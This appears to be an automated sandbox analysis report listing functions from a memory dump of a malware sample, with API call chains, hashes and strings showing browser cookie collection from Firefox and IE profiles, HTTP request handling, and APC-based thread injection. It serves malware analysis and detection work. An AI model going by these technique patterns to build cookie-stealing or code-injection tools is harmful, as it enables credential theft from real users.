Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C51AB, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 438 Total matches: 26synchronizationmemorythread
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
